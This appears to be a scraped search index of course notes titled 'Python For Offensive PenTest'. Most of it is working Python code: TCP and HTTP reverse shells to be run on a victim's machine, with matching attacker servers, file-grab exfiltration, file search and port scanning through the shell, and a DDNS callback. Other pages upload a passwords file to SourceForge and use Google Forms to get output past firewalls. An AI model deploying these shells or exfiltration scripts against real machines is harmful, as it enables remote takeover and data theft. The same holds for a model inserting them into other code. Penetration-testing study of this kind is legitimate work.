              '''\nCaution\n--------\nUsing this script for any malicious purpose is prohibited and against the law. Please read SourceForge terms and conditions carefully. \nUse it on your own risk. \n'''\n\n# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport paramiko\nimport scp\n\n# File Management on SourceForge \n# [+] https://sourceforge.net/p/forge/documentation/File%20Management/\n\n\nssh_client = paramiko.SSHClient() # creating an ssh_client instance using paramiko sshclient class\n\nssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\nssh_client.connect(\"web.sourceforge.net\", username=\"myusernameatSourceForge\", password=\"PASSWORD HERE\") #Authenticate ourselves to the sourceforge. Server, user and password from step 1\nprint (\"[+] Authenticating against web.sourceforge.net\")\n\nscp = scp.SCPClient(ssh_client.get_transport()) #after a sucessful authentication the ssh session id will be passed into SCPClient function\n\nscp.put(\"C:/Users/Alex/Desktop/passwords.txt\") # upload a file, for instance password.txt\nprint (\"[+} File is uploaded\")\n\nscp.close()\n\nprint(\"[+] Closing the socket\")\n
              ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/bypassing-next-generation-firewalls/#using-google-forms-for-submitting-output","title":"Using Google Forms for submitting output","text":"

              1. Create a Google Form with a quick test and copy the link of the survey.

              2. Copy the name of the form from the source code of the google form.

              3. Paste URL of the survey + name of the form in the script:

              '''\nCaution\n--------\nUsing this script for any malicious purpose is prohibited and against the law. Please read Google terms and conditions carefully. \nUse it on your own risk. \n'''\n\n# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\n\nimport requests\n\nurl = 'https://docs.google.com/forms/d/1Ndjnm5YViqIYXyIuoTHsCqW_YfGa-vaaKEahY2cc5cs/formResponse'\n\nform_data = {'entry.1301128713':'Lets see how we can use this, in the next exercise'}\n\nr = requests.post(url, data=form_data)\n\n# Submitting form-encoded data in requests:-\n# http://docs.python-requests.org/en/latest/user/quickstart/#more-complicated-post-requests\n
              ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/bypassing-next-generation-firewalls/#exercise","title":"Exercise","text":"
              Try to combine the above ideas (Google Form + Twitter + SourceForge) Into a single script and see if you can control your target without direct interaction.\n
              ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/coding-a-data-exfiltration-script-http-shell/","title":"Coding a data exfiltration script for a http shell","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-data-exfiltration-script-http-shell/#client-side","title":"Client side","text":"

              To be run on victim's computer.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport requests\nimport os\nimport subprocess\nimport time\n\nwhile True:\n\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n\n\n# Now similar to what we have done in our TCP reverse shell, we check if file exisit in the first place, if not then we \n# notify our attacker that we are unable to find the file, but if the file is there then we will :-\n# 1.Append /store in the URL\n# 2.Add a dictionary key called 'file'\n# 3.requests library use POST method called \"multipart/form-data\" when submitting files\n\n#All of the above points will be used on the server side to distinguish that this POST is for submitting a file NOT a usual command output. Please see the server script for more details on how we can use these points to get the file\n\n\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path): # check if the file is there\n            url = \"http://192.168.0.152:8080/store\" # Appended /store in the URL\n            files = {'file': open(path, 'rb')} # Add a dictionary key called 'file' where the key value is the file itself\n            r = requests.post(url, files=files) # Send the file and behind the scenes, requests library use POST method called \"multipart/form-data\"\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n    else:\n        CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-data-exfiltration-script-http-shell/#server-side","title":"Server side","text":"
              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport http.server\nimport os, cgi\n\nHOST_NAME = '10.0.2.15'\nPORT_NUMBER = 8080\n\nclass MyHandler(http.server.BaseHTTPRequestHandler):\n\n    def do_GET(self):\n\n        command = input(\"Shell> \")\n        self.send_response(200)\n        self.send_header(\"Content-type\", \"text/html\")\n        self.end_headers()\n        self.wfile.write(command.encode())\n\n    def do_POST(self):\n\n        #Here we will use the points which we mentioned in the Client side, as a start if the \"/store\" was in the URL then this is a POST used for file transfer so we will parse the POST header, if its value was 'multipart/form-data' then we will pass the POST parameters to FieldStorage class, the \"fs\" object contains the returned values from FieldStorage in dictionary fashion.\n\n        if self.path == '/store':\n            try:\n                ctype, pdict = cgi.parse_header(self.headers.get('content-type'))\n                if ctype == 'multipart/form-data':\n                    fs = cgi.FieldStorage(fp=self.rfile, headers = self.headers, environ= {'REQUEST_METHOD': 'POST'})\n                else:\n                    print('[-]Unexpected POST request')\n                fs_up = fs['file'] # Remember, on the client side we submitted the file in dictionary fashion, and we used the key 'file'\n                with open('/home/kali/place_holder.txt', 'wb') as o: # create a file holder called 'placer_holder.txt' and write the received file into this 'place_holder.txt'. After the operation you need to rename this file to the original one, so the extention gets recognized. \n                    print('[+] Writing file ..')\n                    o.write(fs_up.file.read())\n                    self.send_response(200)\n                    self.end_headers()\n            except Exception as e:\n                print(e)\n            return\n        self.send_response(200)\n        self.end_headers()\n        length = int(self.headers['Content-length'])\n        postVar = self.rfile.read(length)\n        print(postVar.decode())\n\nif __name__ == '__main__':\n    server_class = http.server.HTTPServer\n    httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)\n    try:\n        httpd.serve_forever()\n    except KeyboardInterrupt:\n        print ('[!] Server is terminated')\n        httpd.server_close()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/","title":"Coding a low level data exfiltration - TCP connection","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/#client","title":"Client","text":"

              To be run on victim's computer.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\nimport socket\nimport subprocess\nimport os\n\n\n# In the transfer function, we first check if the file exists in the first place, if not we will notify the attacker\n# otherwise, we will create a loop where each time we iterate we will read 1 KB of the file and send it, since the\n# server has no idea about the end of the file we add a tag called 'DONE' to address this issue, finally we close the file\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while len(packet) > 0:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n    else:\n        s.send('File not found'.encode())\ndef connecting():\n    s = socket.socket()\n    s.connect((\"10.0.2.15\", 8080))\n\n    while True:\n        command = s.recv(1024)\n\n        if 'terminate' in command.decode():\n            s.close()\n            break\n\n\n# if we received grab keyword from the attacker, then this is an indicator for file transfer operation, hence we will split the received commands into two parts, the second part which we intersted in contains the file path, so we will store it into a varaible called path and pass it to transfer function\n\n# Remember the Formula is  grab*<File Path>\n# Absolute path example:  grab*C:\\Users\\Hussam\\Desktop\\photo.jpeg\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split(\"*\")\n            try:\n                transfer(s, path)\n            except:\n                pass\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n            s.send(CMD.stderr.read())\n            s.send(CMD.stdout.read())\ndef main():\n    connecting()\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/#server","title":"Server","text":"

              To be run on attacker's computer.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\nimport os\nimport socket\n\ndef transfer(conn, command):\n    conn.send(command.encode())\n    grab, path = command.split(\"*\")\n    f = open('/home/kali/'+path, 'wb')\n    while True:\n        bits = conn.recv(2048)\n        if bits.endswith('DONE'.encode()):\n            f.write(bits[:-4]) # Write those last received bits without the word 'DONE' \n            f.close()\n            print ('[+] Transfer completed ')\n            break\n        if 'File not found'.encode() in bits:\n            print ('[-] Unable to find out the file')\n            break\n        f.write(bits)\ndef connecting():\n    s = socket.socket()\n    s.bind((\"10.0.2.15\", 8080))\n    s.listen(1)\n    print('[+] Listening for income TCP connection on port 8080')\n    conn, addr = s.accept()\n    print('[+]We got a connection from', addr)\n\n    while True:\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send('terminate'.encode())\n            break\n        elif 'grab' in command:\n            transfer(conn, command)\n        else:\n            conn.send(command.encode())\n            print(conn.recv(1024).decode())\ndef main():\n    connecting()\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/#using-pyinstaller","title":"Using pyinstaller","text":"

              See pyinstaller.

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-reverse-shell-that-scans-ports/","title":"Coding a reverse shell that scans ports","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              ","tags":["python","python pentesting","scripting","reverse shell","port scanner"]},{"location":"python/coding-a-reverse-shell-that-scans-ports/#client-side","title":"Client side","text":"

              To be run on the victim's machine.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport os\nimport socket\nimport subprocess\n\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while packet:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n        f.close()\n\ndef scanner(s, ip, ports):\n    scan_result = '' # scan_result is a variable stores our scanning result\n    for port in ports.split(','):\n        try: # we will try to make a connection using socket library for EACH one of these ports\n            sock =  socket.socket()\n#connect_ex This function returns 0 if the operation succeeded,  and in our case operation succeeded means that the connection happens whihch means the port is open otherwsie the port could be closed or the host is unreachable in the first place.\n            output = sock.connect_ex((ip, int(port)))\n            if output == 0:\n                scan_result = scan_result + \"[+] Port \" + port + \" is opened\" + \"\\n\"\n            else:\n                scan_result = scan_result + \"[-] Port \" + port + \" is closed\"\n                sock.close()\n        except Exception as e:\n            pass\n    s.send(scan_result.encode())\ndef connect():\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = s.recv(1024)\n        if 'terminate' in command.decode():\n            s.close()\n            break\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split('*')\n            try:\n                transfer(s, path)\n            except:\n                s.send(str(e).encode())\n                pass\n\n        elif 'scan' in command.decode(): # syntax: scan 10.10.10.100:22,80\n            command = command[5:].decode() #slice the leading first 5 char \n            ip, ports = command.split(':')\n            scanner(s, ip, ports)\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n            s.send(CMD.stdout.read())\n            s.send(CMD.stderr.read())\n\ndef main():\n    connect()\n\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell","port scanner"]},{"location":"python/coding-a-reverse-shell-that-searches-files/","title":"Coding a reverse shell that searches files","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-reverse-shell-that-searches-files/#client-side","title":"Client side","text":"

              To be run in the victim's machine.

              import requests\nimport os\nimport subprocess\nimport time\n\nwhile True:\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            filer = {'file': open(path, 'rb')}\n            r = requests.post(url, files=filer)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n    elif 'search' in command: #The Formula is search <path>*.<file extension>  -->for example let's say that we got search C:\\\\*.pdf\n        command = command[7:] #cut off the the first 7 character ,, output would be  C:\\\\*.pdf\n        path, ext = command.split('*')\n        lists = '' # here we define a string where we will append our result on it\n\n#os.walk is a function that will naviagate ALL the directoies specified in the provided path and returns three values:-\n#1-dirpath is a string contains the path to the directory\n#2-dirnames is a list of the names of the subdirectories in  dirpath\n#3-files is a list of the files name in dirpath\n\n#Once we got the files list, we check each file (using for loop), if the file extension was matching what we are looking for, then we add the directory path into list string.\n\n\n\n        for dirpath, dirname, files in os.walk(path):\n           for file in files:\n               if file.endswith(ext):\n                   lists = lists + '\\n' + os.path.join(dirpath, file)\n        requests.post(url='http://192.168.0.152:8080', data=lists)\n    else:\n        CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/","title":"Coding a TCP connection and a reverse shell","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#basic-connection","title":"Basic connection","text":"

              From eJPT study module + the book Networking computers.

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#client-side","title":"Client side","text":"

              To be run on victim's computer.

              from socket import *\nserverName = \"servername or ip\"\nserverPort = 12000\n\nclientSocket = socket(AF_INET, SOCK_STREAM)\nclientSocket.connect((serverName, serverPort))\n\nsentence = str(input(\"Enter a sentence in lower case: \"))\nclientSocket.send(sentence.encode())\nmodifiedSentence = clientSocket.recv(1024)\n\nprint(\"From server: \", modifiedSentence.decode())\nclientSocket.close()\n

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#server-side","title":"Server side","text":"
              from socket import *\n\nserverPort = 12000\nserverSocket = socket(AF_INET, SOCK_STREAM)\n\nserverSocket.bind(('', serverPort))\nserverSocket.listen(1)\nprint(\"Server is ready to receive...\")\n\nwhile True:\n    connectionSocket, addr = serverSocket.accept()\n    sentence = connectionSocket.recv(1024).decode()\n    capitalizedsentence = sentence.upper()\n    connectionSocket.send(capitalizedsentence.encode())\n    connectionSocket.close()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#reverse-tcp-connection","title":"Reverse TCP connection","text":"

              From the course: Python For Offensive PenTest: A Complete Practical

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#client-side_1","title":"Client side","text":"

              To be run on victim's computer.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket    # For Building TCP Connection\nimport subprocess # To start the shell in the system\n\ndef connect():\n    s = socket.socket()\n    s.connect(('10.0.2.6', 1234)) # Here we define the Attacker IP and the listening port\n\n    while True:\n        command = s.recv(1024) # keep receiving commands from the Kali machine, read the first KB of the tcp socket\n\n        if 'terminate' in command.decode(): # if we got terminate order from the attacker, close the socket and break the loop\n            s.close()\n            break\n        else:   # otherwise, we pass the received command to a shell process\n\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n            s.send(CMD.stdout.read()) # send back the result\n            s.send(CMD.stderr.read()) # send back the error -if any-, such as syntax error\n\ndef main():\n    connect()\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#server-side_1","title":"Server side","text":"

              To be run on attacker's computer.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\n\ndef connect():\n\n    s = socket.socket()\n    s.bind((\"10.0.2.15\", 1234))\n    s.listen(1) # define the backlog size for the Queue, I made it 1 as we are expecting a single connection from a single\n    conn, addr = s.accept() # accept() function will retuen the connection object ID (conn) and will return the client(target) IP address and source port in a tuple format (IP,port)\n    print ('[+] We got a connection from', addr)\n\n    while True:\n\n        command = input(\"Shell> \")\n\n        if 'terminate' in command: # If we got terminate command, inform the client and close the connect and break the loop\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        elif '' in command: # If the user just click enter, we will send a whoami command\n            conn.send('whoami'.encode()) \n            print( conn.recv(1024).decode()) \n        else:\n            conn.send(command.encode()) # Otherwise we will send the command to the target\n            print( conn.recv(1024).decode()) # print the result that we got back\n\ndef main():\n    connect()\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#using-pyinstaller","title":"Using pyinstaller","text":"

              See pyinstaller.

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-an-http-reverse-shell/","title":"Coding an http reverse shell","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-an-http-reverse-shell/#client-side","title":"Client side","text":"

              To be run on victim's computer.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport requests\nimport subprocess\nimport time\n\nwhile True:\n\n    req = requests.get('http://192.168.0.152:8080') # Send GET request to our kali server\n    command = req.text # Store the received txt into command variable\n\n    if 'terminate' in command:\n        break\n\n    else:\n        CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read()) # POST the result\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read()) # or the error -if any-\n\n    time.sleep(3)\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-an-http-reverse-shell/#server-side","title":"Server side","text":"

              To be run on attacker's computer.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport http.server\n\nHOST_NAME = \"192.168.0.152\" // our attacker machine\nPORT_NUMBER = 8080 // attacker listening port\n\nclass MyHandler(http.server.BaseHTTPRequestHandler): # MyHandler defines what we should do when we receive a GET/POST\n\n    def do_GET(self):\n\n        command = input(\"Shell> \")\n        self.send_response(200)\n        self.send_header(\"Content-type\", \"text/html\")\n        self.end_headers()\n        self.wfile.write(command.encode())\n\n    def do_POST(self):\n\n        self.send_response(200)\n        self.end_headers()\n        length = int(self.headers['Content-length']) #Define the length which means how many bytes the HTTP POST data contains, the length value has to be integer\n        postVar = self.rfile.read(length)\n        print(postVar.decode())\n\nif __name__ == \"__main__\":\n\n    # We start a server_class and create httpd object and pass our kali IP,port number and class handler(MyHandler)\n    server_class = http.server.HTTPServer\n    httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)\n    try:\n        httpd.serve_forever() # start the HTTP server, however if we got ctrl+c we will Interrupt and stop the server\n    except KeyboardInterrupt:\n        print('[!] Server is terminated')\n        httpd.server_close()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/ddns-aware-shell/","title":"Coding a DDNS aware shell","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.

              When coding a reverse shell you don't need to hardcode the IP address of the attacker machine. Instead, you can use a Dynamic DNS server such as https://www.noip.com/. To inform this server of our attacker IP public address we will install a linux dynamic client on our kali (an agent that will do the trick).

              See noip to lear how to install a linux dynamic client on the attacker machine.

              After installing the agent, let's see the modification needed on the client side of the TCP reverse shell.

              ","tags":["python","python pentesting","scripting","ddns","reverse shell"]},{"location":"python/ddns-aware-shell/#client-side","title":"Client side","text":"
              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\nimport subprocess\nimport os\n\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while len(packet) > 0:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n    else:\n        s.send('File not found'.encode())\ndef connecting(ip):\n    s = socket.socket()\n    s.connect((ip, 8080))\n\n    while True:\n        command = s.recv(1024)\n\n        if 'terminate' in command.decode():\n            s.close()\n            break\n\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split(\"*\")\n            try:\n                transfer(s, path)\n            except:\n                pass\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n            s.send(CMD.stderr.read())\n            s.send(CMD.stdout.read())\ndef main():\n    ip = socket.gethostbyname('cared.ddns.net')\n    print (ip)\n    return\n    connecting(ip)\nmain()\n
              ","tags":["python","python pentesting","scripting","ddns","reverse shell"]},{"location":"python/dns-poisoning/","title":"DNS poisoning","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.

              1. Add a new line to hosts file in windows with attacker IP and an url

